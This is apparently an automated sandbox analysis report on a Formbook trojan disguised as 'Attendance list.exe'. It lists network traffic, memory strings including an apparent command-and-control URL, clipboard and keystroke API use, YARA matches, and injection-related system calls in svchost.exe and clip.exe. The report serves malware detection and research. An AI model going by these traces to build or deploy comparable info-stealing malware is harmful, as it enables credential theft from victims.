                Content-Encoding: gzip
            Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Date: Tue, 02 Jul 2024 05:15:40 GMT
                Server: Apache
                Content-Encoding: gzip
            Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Date: Tue, 02 Jul 2024 05:15:43 GMT
                Server: Apache
                Content-Encoding: gzip
            Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Type: text/html
                Content-Length: 626
                Connection: close
                Date: Tue, 02 Jul 2024 05:15:45 GMT
                Server: Apache
                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
            Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 02 Jul 2024 05:22:14 GMT
                Server: Apache
                Content-Length: 203
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>
            Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 02 Jul 2024 05:22:17 GMT
                Server: Apache
                Content-Length: 203
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>
            Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 02 Jul 2024 05:22:19 GMT
                Server: Apache
                Content-Length: 203
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>
            Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 02 Jul 2024 05:22:22 GMT
                Server: Apache
                Content-Length: 203
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>
            Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 02 Jul 2024 05:17:40 GMT
                Server: Apache
                Content-Length: 16026
                Connection: close
                Content-Type: text/html
            Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 02 Jul 2024 05:17:42 GMT
                Server: Apache
                Content-Length: 16026
                Connection: close
                Content-Type: text/html
            Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 02 Jul 2024 05:17:45 GMT
                Server: Apache
                Content-Length: 16026
                Connection: close
                Content-Type: text/html
            Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 02 Jul 2024 05:17:47 GMT
                Server: Apache
                Content-Length: 16026
                Connection: close
                Content-Type: text/html; charset=utf-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jul 2024 05:17:53 GMTServer: Apache/2.4.56 (Debian)X-Powered-By: PHP/7.4.33Strict-Transport-Security: max-age=63072000; preloadConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 62 62 39 0d 0a 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 6c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 
5f 69 6e 6e 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 2e 61 74 2f 64 61 74 61 2f 67 66 78 2f 64 74 5f 6c 6f 67 6f 5f 70 61 72 6b 69 6e 67 2e 70 6e 67 22 20 61 6c 74 3d 22 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 2e 61 74 20 4c 6f 67 6f 22 20 2f 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 54 68 65 20 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 21 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 70 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 32 30 70 78 20 30 20 31 30 70 78 20 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 22 20 63 6c 61 73 73 3d 22 61 6c 69 67 6e 2d 63 65 6e 74 65 72 22 3e 41 6c 73 20 44 6f 6d 61 69 6e 69 6e 68 61 62 65 72 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 20 49 68 72 65 20 44 6f 6d 61 69 6e 73 20 6f 6e 6c 69 6e 65 20 76 65 72 77
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jul 2024 05:17:56 GMTServer: Apache/2.4.56 (Debian)X-Powered-By: PHP/7.4.33Strict-Transport-Security: max-age=63072000; preloadConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jul 2024 05:17:58 GMTServer: Apache/2.4.56 (Debian)X-Powered-By: PHP/7.4.33Strict-Transport-Security: max-age=63072000; preloadConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jul 2024 05:18:01 GMTServer: Apache/2.4.56 (Debian)X-Powered-By: PHP/7.4.33Strict-Transport-Security: max-age=63072000; preloadConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 02 Jul 2024 05:18:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 02 Jul 2024 05:18:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 02 Jul 2024 05:18:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 02 Jul 2024 05:18:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 02 Jul 2024 05:18:28 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: close
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4470199109.00000000080C0000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dmtxwuatbz.cc
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4470199109.00000000080C0000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dmtxwuatbz.cc/lfkn/
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006F78000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005FD8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.domaintechnik.at/data/gfx/dt_logo_parking.png
            Source: clip.exe, 00000004.00000003.2363580118.000000000795E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.000000000660C000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.000000000566C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://assets.web.com/legal/English/MSA/v1.0.0.3/ServicesAgreement.pdf
            Source: clip.exe, 00000004.00000003.2363580118.000000000795E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006DE6000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005E46000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006DE6000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005E46000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006DE6000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005E46000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css
            Source: clip.exe, 00000004.00000003.2363580118.000000000795E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: clip.exe, 00000004.00000003.2363580118.000000000795E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.000000000660C000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.000000000566C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vd
            Source: clip.exe, 00000004.00000003.2363580118.000000000795E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: clip.exe, 00000004.00000003.2363580118.000000000795E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: clip.exe, 00000004.00000003.2363580118.000000000795E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.000000000729C000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.00000000062FC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
            Source: clip.exe, 00000004.00000002.4461785541.0000000002780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: clip.exe, 00000004.00000002.4461785541.0000000002780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: clip.exe, 00000004.00000002.4461785541.0000000002780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: clip.exe, 00000004.00000002.4461785541.0000000002780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: clip.exe, 00000004.00000002.4461785541.0000000002780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: clip.exe, 00000004.00000003.2359386473.0000000007930000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.000000000729C000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.00000000062FC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.helpers-lion.online&rand=
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.000000000729C000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.00000000062FC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0093425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0093425A
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_00934458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00934458
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_00920219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00920219
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0094CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0094CDAC

            E-Banking Fraud

            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4463038232.00000000042F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4461289694.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2180673228.00000000034C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4462982503.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2180342193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4463119733.0000000004980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2181155888.0000000005A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4463038232.00000000042F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4461289694.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2180673228.00000000034C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4462982503.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2180342193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4463119733.0000000004980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2181155888.0000000005A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: This is a third-party compiled AutoIt script.0_2_008C3B4C
            Source: Attendance list.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: Attendance list.exe, 00000000.00000000.1985627853.0000000000975000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_19659501-a
            Source: Attendance list.exe, 00000000.00000000.1985627853.0000000000975000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_ab5baff0-5
            Source: Attendance list.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_40eaf418-0
            Source: Attendance list.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_5a41d322-4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042AFF3 NtClose,2_2_0042AFF3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672B60 NtClose,LdrInitializeThunk,2_2_03672B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03672DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03672C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036735C0 NtCreateMutant,LdrInitializeThunk,2_2_036735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03674340 NtSetContextThread,2_2_03674340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03674650 NtSuspendThread,2_2_03674650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BE0 NtQueryValueKey,2_2_03672BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BF0 NtAllocateVirtualMemory,2_2_03672BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BA0 NtEnumerateValueKey,2_2_03672BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672B80 NtQueryInformationFile,2_2_03672B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AF0 NtWriteFile,2_2_03672AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AD0 NtReadFile,2_2_03672AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AB0 NtWaitForSingleObject,2_2_03672AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672F60 NtCreateProcessEx,2_2_03672F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672F30 NtCreateSection,2_2_03672F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672FE0 NtCreateFile,2_2_03672FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672FA0 NtQuerySection,2_2_03672FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672FB0 NtResumeThread,2_2_03672FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672F90 NtProtectVirtualMemory,2_2_03672F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672E30 NtWriteVirtualMemory,2_2_03672E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672EE0 NtQueueApcThread,2_2_03672EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672EA0 NtAdjustPrivilegesToken,2_2_03672EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672E80 NtReadVirtualMemory,2_2_03672E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672D30 NtUnmapViewOfSection,2_2_03672D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672D00 NtSetInformationFile,2_2_03672D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672D10 NtMapViewOfSection,2_2_03672D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672DD0 NtDelayExecution,2_2_03672DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672DB0 NtEnumerateKey,2_2_03672DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672C60 NtCreateKey,2_2_03672C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672C00 NtQueryInformationProcess,2_2_03672C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672CF0 NtOpenProcess,2_2_03672CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672CC0 NtQueryVirtualMemory,2_2_03672CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672CA0 NtQueryInformationToken,2_2_03672CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673010 NtOpenDirectoryObject,2_2_03673010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673090 NtSetValueKey,2_2_03673090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036739B0 NtGetContextThread,2_2_036739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673D70 NtOpenThread,2_2_03673D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673D10 NtOpenProcessToken,2_2_03673D10
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04684650 NtSuspendThread,LdrInitializeThunk,4_2_04684650
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04684340 NtSetContextThread,LdrInitializeThunk,4_2_04684340
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682C60 NtCreateKey,LdrInitializeThunk,4_2_04682C60
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_04682C70
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_04682CA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_04682D30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682D10 NtMapViewOfSection,LdrInitializeThunk,4_2_04682D10
